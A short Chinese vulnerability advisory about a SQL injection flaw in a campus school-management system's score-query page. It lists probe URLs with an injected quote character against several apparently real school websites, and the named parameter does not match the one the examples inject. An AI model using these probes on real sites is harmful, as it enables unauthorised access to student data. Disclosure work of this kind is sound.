某校园系统一处遗漏通用SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 校园系统通用SQL注入 ### 详细说明: 漏洞细节: 见乌云,URL: [WooYun: 某通用型校园校务系统SQL注入](http://www.wooyun.org/bugs/wooyun-2014-082279) 属于遗漏一处: 漏洞位置在学生成绩查询处的输入处 位置:SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb 注入参数:StartKSID 借用前人案例: http://www.sdwhys.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.suyaxing.com:81/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.hwsyxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息